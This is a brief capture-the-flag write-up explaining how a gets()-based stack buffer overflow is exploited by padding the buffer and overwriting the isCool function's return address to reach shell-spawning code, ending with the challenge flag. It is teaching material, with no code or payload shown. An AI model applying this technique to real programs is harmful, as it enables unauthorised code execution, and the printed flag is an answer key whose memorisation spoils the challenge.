El Clasico

By Uday Shankar

This is a simple buffer overflow problem. There is a blatant vulnerability in the program, where it uses the gets() function to read the input. This function keeps on reading and writing to the given buffer until it encounters a newline. You can write far past the end of the buffer as long as you do not enter a newline. The buffer is located on the stack, a memory region that also contains sensitive information, such as return addresses. By overwriting the return address of the isCool function, we can jump to any point in the code. Notably, we can skip the code corresponding to the if statement and go straight to the code that spawns a shell. We generate the input required to exploit the overflow by loading the binary in gdb and locating the distance between the return address and the start of the buffer on the stack. Although the absolute locations of items on the stack change from run to run, distances such as these are baked into the binary at compile-time, and thus remain constant. From here, we need to pad the buffer with some useless data, followed by the desired return address. When gets reads the input, it will write the useless data, and write the desired return address over the old return address. Once the function returns, it will go straight to the part of the code that spawns the shell, and from there, it is easy to get the flag.

Flag: one_of_these_pops_up_everytiem